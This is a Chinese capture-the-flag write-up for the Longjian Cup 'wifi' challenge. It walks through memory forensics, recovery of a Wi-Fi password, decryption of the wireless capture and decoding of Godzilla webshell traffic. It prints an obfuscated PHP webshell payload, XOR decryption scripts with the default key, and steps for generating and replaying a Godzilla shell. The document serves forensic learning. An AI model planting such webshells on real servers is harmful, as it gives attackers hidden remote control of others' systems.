首届“陇剑杯”网络安全大赛题目wifi详解

写文章只是为了记录自己的学习，不是粘贴复制就完事了
参考
https://www.cnblogs.com/GKLBB/p/15315725.html
https://www.nctry.com/2449.html
https://www.freebuf.com/sectool/285693.html

题目链接: https://pan.baidu.com/s/1H2iVCuntQuyIemELCDXl6w
提取码: c6pk

常规姿势

文件内容

用wireshake打开客户端.cap
发现流量被加密，但是依旧可以发现WiFi的名字是My_Wifi
要解密的话就需要wifi的密码
对windows而言，只要连过这个wifi，它的信息就会被保存，包括密码
查看连过的wifi

查看某个密码

这些东西都在一个xml文件里

知道了这些后我们就可以去镜像找xml文件了
因为没接触过取证用的volatility
又写了关于我在windows使用volatility取证这档事

扫描镜像里的文件把结果存到files.txt里
打开files.txt搜索.xml
得到四行结果

0x1e6d1530   \Windows\System32\tcpbidi.xml   128
0x3fcc5908  \Windows\System32\RacRules.xml  128
0x3fd0d390  \Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\5dd9f783008543df3e642ff1e99de4e8\System.Xml.ni.dll  128
0x3fd67bb0  \Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll  128

显然这不是我们想找的文件
此外我们还知道的信息是WiFi的名字是My_Wifi
搜索My_Wifi得到一行结果

0x3fdc38c8   \Program Files\My_Wifi.zip\Temp\vmware-admin\VMwareDnD\2a1221c7\My_Wifi.zip 128

先把这个文件dump下来看看

拖到Windows修改文件名为wifi.zip然后解压

题目说了压缩包里有密码的提示

网卡的guid就是密码
同时网卡的guid也是保存配置文件夹的名字
所以在files.txt里搜索Interfaces得到四行结果

0x1c7ec5c8   \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}   128
0x1f78f4b0  \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces  128
0x3fa921c8  \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}   128
0x3fda8be8  \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces  128

题目说了要加上花括号
所以解压密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}
打开里面的xml文件发现密码是233@114514_qwe

得到密码和ssid后对流量解密

选择protocols
找到IEEE 802.11

wifi包解密后
但是wifi这么多包，不确定哪些属于webshell的流量
这时候服务器的包就可以派上用场了
上传哥斯拉用的是POST
过滤POST数据包得到服务器IP：42.192.84.152

导出http对象

得到5个php文件

已知上传的是哥斯拉的马
看到%什么什么应该就知道这是url编码吧
所以首先拿去url解码

拿到php环境执行一下

echo base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD')));

得到上传的代码

可以看出使用的是php_xor_base64的加密器
如果看不出可以用哥斯拉生成对比一下使用的是什么加密器

接下来就是对哥斯拉的数据包解密了
说实话我也不会
所以又写了哥斯拉还原加密流量
看过哥斯拉流量分析后就很容易了
对于哥斯拉POST的数据包使用这个脚本解密

<?phpfunction encode($D,$K){for($i=0;$i<strlen($D);$i++){$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';echo encode(base64_decode(urldecode('xxxxxxx')),$key);

对于哥斯拉的返回包使用这个脚本解密

<?php
function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
// 原来的数据去掉前十六位和后十六位然后解密
echo gzdecode(encode(base64_decode(''),$key));

在POST里肯定没有什么我们想要的东西
所以返回到客户端.cap
筛选http的数据包
这里恰好都是源ip为42.192.84.152
如果有其它源ip不是42.192.84.152的就过滤掉
然后导出http对象

得到这么多文件

把css，js，png结尾的文件删掉
剩下这么多打开查看

发现只有四个是哥斯拉的返回包

利用上面的脚本开始解密
解密的时候要去掉头16位去掉尾16位
其中第一个包解密后为

第二个包解密

第三个包解密

第四个包解密得到flag

大佬的另一种姿势

当你没有解密脚本的时候
已知条件哥斯拉木马的源码

观察发现这个key就是默认的key
也就是key经过md5加密后前16位
验证猜想：用哥斯拉生成一个木马
发现两个是一样的
接下来把木马丢到虚拟机里
用phpstudy搭个环境

打开哥斯拉测试连接

开启burp代理添加

执行一个命令截断

最多四次就出来了，之前导出的http对象不是还剩这四个是格拉斯加密的包吗

这样干的好处就是不需要解密脚本了